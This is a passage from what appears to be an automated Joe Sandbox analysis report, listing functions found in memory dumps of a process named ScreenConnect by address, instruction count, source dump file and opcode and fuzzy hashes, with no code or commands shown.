                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 36f8b9cc76d865e92f948f2fb496f0c23455c6c03feea3a86315cfd75fc6648c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE2124B2800309DFDB20DF9AC444BDEFBF4EB88220F15842AD919A7240D378A546CFA5
                                                                                                                                                                                                                                                        Function 018BD597 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810085782.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_18bd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                                                                                                                                                                                                                                        • Instruction ID: c0555f2bff60ba3fca2ab15921797cdd33a68d95d38942093254207bf19565ae
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B011E176404284DFCB06CF44D9C4B56BF72FB84314F24C2A9D8094B657C33AD55ACBA1
                                                                                                                                                                                                                                                        Function 040D1C20 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 647339a90d4c8e61c2920eb7e6a591457f860e278eb98c942e203b03b78afba8
                                                                                                                                                                                                                                                        • Instruction ID: ec970d1cbdf323430ca2caa17c0bf5aa86d877306e5ac7b3ec8ed9d138567541
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 647339a90d4c8e61c2920eb7e6a591457f860e278eb98c942e203b03b78afba8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68211F74F1020ADFDB00DBA8E8545AEBBB6FF98300B108958D505B7360DF34AD158FA1
                                                                                                                                                                                                                                                        Function 01918AA0 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3d4e225acf626ca1750d88b88638a8bdc48f838ae7bff447a39afbfcc3d86e6c
                                                                                                                                                                                                                                                        • Instruction ID: d2f366953cf81db82e5f93400f338a13ab5bdcb36687d2b91bd6b4d78fd28f92
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d4e225acf626ca1750d88b88638a8bdc48f838ae7bff447a39afbfcc3d86e6c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB114276A0020A9FCB01DF64D9809DDBBF1FF49314B10816AD904BB261D775AA1ACB90
                                                                                                                                                                                                                                                        Function 040D456A Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7a937524d3c6df334f6ba1445d52d2cf9c3fc6a2f5a9649183a0594afdeb01b1
                                                                                                                                                                                                                                                        • Instruction ID: 0778e83751b06a4c8eb648c00e5454b7314a4dba28cb907f042221dd6e1c8718
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a937524d3c6df334f6ba1445d52d2cf9c3fc6a2f5a9649183a0594afdeb01b1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B014C363847805FDB16EB78A8524ED3FF1EF4732134241EAD489CB193E6289A17C341
                                                                                                                                                                                                                                                        Function 01915350 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ceeae97a187a1c7675edb1ce5357f00ec443fd6838e49b86f3cabedf87a7e121
                                                                                                                                                                                                                                                        • Instruction ID: f70e3bac1ad9a8a661ad1f2602c75d5069e2a150d586924a23b0593863c9ad6c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ceeae97a187a1c7675edb1ce5357f00ec443fd6838e49b86f3cabedf87a7e121
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E421F2B6C003498FDB14CF9AD4447EEFBF5EB88224F15842AD959A7240C378A646CFA5
                                                                                                                                                                                                                                                        Function 040D28D0 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0d500a8f08b841171193170b4a9d01dfa45d5aaf08878171aaa934caed115f0e
                                                                                                                                                                                                                                                        • Instruction ID: 055a60daa0e64e499506c01873fbc20f05b231bc59a93c1e119277315a2766ff
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d500a8f08b841171193170b4a9d01dfa45d5aaf08878171aaa934caed115f0e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8701D230B043009FEB14AA79E84066EB7EAAF89254B40C56DD449E7755EBB0EC598391
                                                                                                                                                                                                                                                        Function 040D50A8 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b89d6cecae882248eb0e7f3b825d41caa6e868365f05327f934a6f9d0e1c3156
                                                                                                                                                                                                                                                        • Instruction ID: eb771e0e46286c99923126618d72914a49b7b4758a3663f703ddf019a8c2549f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b89d6cecae882248eb0e7f3b825d41caa6e868365f05327f934a6f9d0e1c3156
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5014C35700712DF9725DF69D884A1AB7EAAFCC6293244068E94EAB754DB60FC46CBC0
                                                                                                                                                                                                                                                        Function 01918B95 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 80a490976eef8a9d737709f050d0d7e6cf2670d309737fd1af915b2a7d62d1fa
                                                                                                                                                                                                                                                        • Instruction ID: 32f85e6ba2508cfc4b42a6a5d6bef969360b53279acf24447001716e6837528e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80a490976eef8a9d737709f050d0d7e6cf2670d309737fd1af915b2a7d62d1fa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6116A3190010DAFDF04DFA8D880AECBBB2FF85305B59C954E009AB119C771AD86DFA1
                                                                                                                                                                                                                                                        Function 0191CBC0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 92eea7ced198bdb43b8fd434a20828aa67db16635d7ee7e618835e49884e1ce6
                                                                                                                                                                                                                                                        • Instruction ID: 0ae5cf2ecb947702314746cb1d4cbc0c2bba40bb10221c90dc3bf6b092649b4a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92eea7ced198bdb43b8fd434a20828aa67db16635d7ee7e618835e49884e1ce6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1811DA71E1021DDBEF14EBA8D8557EDBBB1AF89311F00446AD006BB2A0DAB41D84CBA5
                                                                                                                                                                                                                                                        Function 01918B30 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7f8d5fa3600002f5262060ae3d11a6c4d011918055f015fd5f0adcf4cf692cc3
                                                                                                                                                                                                                                                        • Instruction ID: f05688dbf30327753ac055092e8b895dbc1e559789dbfded3e5358dde8bc8fe3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f8d5fa3600002f5262060ae3d11a6c4d011918055f015fd5f0adcf4cf692cc3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9001D232D0015D9BEF04DFA9E8408DDBBB2FF89310F058526E409B7214DB306A47CB90
                                                                                                                                                                                                                                                        Function 0191CBB0 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 88861e1e2c7ac366d516e0d7b476399f55522faab34fb8dd1a32a70983a2d987
                                                                                                                                                                                                                                                        • Instruction ID: f34325249bbc8081172f5ccf2cd95acaa7855cce181b204e07e6b9475de28fba
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88861e1e2c7ac366d516e0d7b476399f55522faab34fb8dd1a32a70983a2d987
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD117071E0031C9BEF14DBA4D8617DD7BB1AF49310F000869D002B73A4DBB42D80CBA5
                                                                                                                                                                                                                                                        Function 01918AB0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: afdd3ddd14e3f664bce6398a5130ba6cff4239c4f715d9ddbe37027e673572d7
                                                                                                                                                                                                                                                        • Instruction ID: 84ca7d71d2566e9c414ffb3bc12b7ae0362a350caf776f96f7b61b28ac8658a0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: afdd3ddd14e3f664bce6398a5130ba6cff4239c4f715d9ddbe37027e673572d7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF110035A0020A9FCF00DFA8D9409DEBBF5FF49314B108569D905BB250D771AA0ACB91
                                                                                                                                                                                                                                                        Function 040D4958 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3a24c1cf145b3cf30b240fbc74c6c7a5d17061ca07631c6e7b674eebe35759dd
                                                                                                                                                                                                                                                        • Instruction ID: 192cd65905bf91eda9beeb72af507d7f1586d534b1d546b215ce79f63d55b2d8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a24c1cf145b3cf30b240fbc74c6c7a5d17061ca07631c6e7b674eebe35759dd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A01DF363002052BE705B66A94D066FB2D3EFD56643908929D54E9B354DE70FC0A8BA2
                                                                                                                                                                                                                                                        Function 018BD006 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810085782.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_18bd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 6efc599e1d9227125ba80a09dff7e95d21964fa684af0ec458081feca20834eb
                                                                                                                                                                                                                                                        • Instruction ID: 97c0189d27f875709eaddc806d61e4850f3aca4dc2f4cf973a959374deca2d74
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6efc599e1d9227125ba80a09dff7e95d21964fa684af0ec458081feca20834eb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF01807140D3C0AFD7128B258C84792BFA4EF43264F1985DBE988CF2A3C2695C45CB72
                                                                                                                                                                                                                                                        Function 0191A9C8 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e157036864a1d927b6505ad5f8675fc651d91f324766c470852d49dec9994300
                                                                                                                                                                                                                                                        • Instruction ID: c332103cad5d4d7f98fb72fbb40a41e9ddb7819a3b5bf8793f84e9b9e34107a8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e157036864a1d927b6505ad5f8675fc651d91f324766c470852d49dec9994300
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79012B71B013199B9B058A6DA8444ABB7D9FFC4610314896ED409EB300DFB1DC0287D4
                                                                                                                                                                                                                                                        Function 01914EF8 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: fb20489b84f08219ffaba66edb56505344c95ea6d0b7dbf66e0f32e0d1d7f290
                                                                                                                                                                                                                                                        • Instruction ID: bed54825f4ce81ec2908fd8ef736e166118a158d7f92a002aac8ea0def84b2ee
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb20489b84f08219ffaba66edb56505344c95ea6d0b7dbf66e0f32e0d1d7f290
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF014E7190D3442FDB15677994651AD7FA4DE47210B4544DBD08ADB343DE34D4478392
                                                                                                                                                                                                                                                        Function 018BD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810085782.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_18bd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: cd51f2f2e2f55ae762e92a656aab6427fcaacb686af73594d01f925001c00864
                                                                                                                                                                                                                                                        • Instruction ID: 188f5936ba95877b1c04b2119c262a948ffb720c5baf526dc8fc411fc53518f1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd51f2f2e2f55ae762e92a656aab6427fcaacb686af73594d01f925001c00864
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A01FC71405344ABE7108E55C8C07A6BF98DF413A8F18C516ED498F343C2759642CAB1
                                                                                                                                                                                                                                                        Function 0191BC60 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c3faef87ff6418de13050160eb9119677251840e09d47896c38664946466ed2f
                                                                                                                                                                                                                                                        • Instruction ID: db9c7a2a8e28631f9d4b9a0e4b893b89efd7f05a3d097c2e589998b08f54c8b4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3faef87ff6418de13050160eb9119677251840e09d47896c38664946466ed2f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B401D6B280D394CFD7069B78A8841C8BFF0EF57224F0945ABC889CB156E2345A57CB52
                                                                                                                                                                                                                                                        Function 040D4500 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ced0ee2527df8750326212b91456db312942c2aaf77b46e63fe05ea54c3e4e28
                                                                                                                                                                                                                                                        • Instruction ID: e40df89973d2d1dc2d405abaecced463dde58ce9a1ecd3a4106a24537d88389a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ced0ee2527df8750326212b91456db312942c2aaf77b46e63fe05ea54c3e4e28
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35018672B0021A9B8F10DE99D8009EFF7F8EFC4211F008136E908E7604E770E9548BE1
                                                                                                                                                                                                                                                        Function 040D44F0 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: bea5e745d750bd11b520c1b74501ee0fed91dfb060465e9aabff036033354d84
                                                                                                                                                                                                                                                        • Instruction ID: 03a10db72472e1b58fd13b8abc6e70dd4d1b96370495cd96797f0cfe113ffd53
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bea5e745d750bd11b520c1b74501ee0fed91dfb060465e9aabff036033354d84
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED01C8B5B102069FDB14EF68D8405FEBBF5EF88315B008236D809E3245E734EA158B91
                                                                                                                                                                                                                                                        Function 01918B40 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a5eed080d4dd0f8209cddd079bea8121e25cda93856eb4bd02d7b1ca36ca7ff1
                                                                                                                                                                                                                                                        • Instruction ID: 2158d48a152c7af51421a373e98c6f57c13f3ae8beec0990b679edde0db5345a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5eed080d4dd0f8209cddd079bea8121e25cda93856eb4bd02d7b1ca36ca7ff1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B012832D0065DABDB04DFA9D8449CDBBB6EF89314F05842AE509B7250DB70A946CBA0
                                                                                                                                                                                                                                                        Function 040D0C18 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b2420be049ef9055f204c821e678a086b22855e1451cf3b9b27b366a7d15de4d
                                                                                                                                                                                                                                                        • Instruction ID: 410badc9846cf1cbc9f55fd511a88045180a62d920293f15a9ce70a5af00960b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2420be049ef9055f204c821e678a086b22855e1451cf3b9b27b366a7d15de4d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1EF0C27181E2CA9FE702CB78E8A49D53F70DF43214B1905DAC080CB1B2CA645A56DB49
                                                                                                                                                                                                                                                        Function 01910E1F Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 481afc1ac314daeaa3d8b86171bf5a017a46081047532372421d4c85dea4d44b
                                                                                                                                                                                                                                                        • Instruction ID: 66c087ce37825f26ce3736d806b735f91c3141fa9a06a151fa0da7b6a8217b10
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 481afc1ac314daeaa3d8b86171bf5a017a46081047532372421d4c85dea4d44b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CBF0FC739083405FC3121734641149E3BA1EED3A5078584AFD14ACB286DA769E4A8F92
                                                                                                                                                                                                                                                        Function 0191BCC8 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
